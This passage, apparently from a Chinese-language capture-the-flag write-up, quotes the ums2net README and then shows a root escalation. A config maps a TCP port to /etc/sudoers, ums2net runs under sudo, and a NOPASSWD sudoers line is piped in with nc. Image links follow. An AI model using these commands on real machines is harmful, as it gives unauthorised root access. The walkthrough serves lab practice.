Build<\/h2>\n\n- cmake .<\/li>\n
- make<\/li>\n<\/ol>\n
How to use ums2net<\/h2>\n\n- Insert the USB Mass Storage. Check \/dev\/disk\/by-id\/ for the unique path for that device.<\/li>\n
- Create a config file base on the above path. Please see the config file format section.<\/li>\n
- Run "ums2net -c ". ums2net will become a daemon in the background. For debugging please add "-d" option to avoid detach.<\/li>\n
- Use nc to write your image to the USB Mass Storage device. For example, "nc -N localhost 29543 < warp7.img"<\/li>\n<\/ol>\n
Config file<\/h2>\n
Each line in the config file maps a TCP port to a device. All the options are separated by space. The first argument is a number represents the TCP port. And the rest of the arguments are in dd-style. For example,<\/p>\n
A line in the config file:<\/p>\n
\"29543 of=\/dev\/disk\/by-id\/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096\"<\/code><\/pre>\nIt means TCP port 29543 is mapped to \/dev\/disk\/by-id\/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 and the block size is 4096.<\/p>\n
Currently we only support "of" and "bs".<\/p>\n<\/blockquote>\n
\u5199\u7684\u662fUSB\u901a\u8fc7tcp\u5171\u4eab\u6570\u636e\uff0c\u5c1d\u8bd5\u53cd\u8fc7\u6765\u8fdb\u884c\u4fee\u6539\u4e00\u4e0bsudoers<\/code>\u6587\u4ef6\uff1a<\/p>\necho "1234 of=\/etc\/sudoers bs=4096" > config\nsudo \/usr\/sbin\/ums2net -c config -d<\/code><\/pre>\n\u7136\u540e\u672c\u5730\u901a\u8fc7nc\u4f20\u8fc7\u53bb\u5c31\u884c\u4e86\uff1a<\/p>\n
echo 'ice ALL=(ALL) NOPASSWD: ALL' |nc $IP 1234<\/code><\/pre>\n<\/div><\/p>\n\u62ff\u4e0broot\u3002<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/blog.findtodd.com\/2024\/10\/09\/hmv-Icecream<\/a><\/p>\n
![\"image-20241009154507241\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130147.png\")
<\/div><\/p>\n![\"image-20241009161459668\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130148.png\")
<\/div><\/p>\n![\"image-20241009164141742\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130149.png\")
<\/div><\/p>\n![\"image-20241009164246571\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130151.png\")
<\/div><\/p>\n![\"image-20241009164308129\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130152.png\")
<\/div>![\"image-20241009161930352\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130153.png\")
<\/div>![\"image-20241009162128630\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130154.png\")
<\/div><\/p>\n![\"image-20241009171301922\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130155.png\")
<\/div><\/p>\n![\"image-20241213101716225\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130156.png\")
<\/div><\/p>\n![\"image-20241213105904745\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130157.png\")
<\/div><\/p>\n![\"image-20241213110615527\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130158.png\")
<\/div><\/p>\n![\"image-20241213111715680\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130159.png\")
<\/div>![\"image-20241213111745358\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130160.png\")
<\/div><\/p>\n![\"image-20241213112008892\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130161.png\")
<\/div><\/p>\n![\"image-20241213113021298\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130162.png\")
<\/div><\/p>\n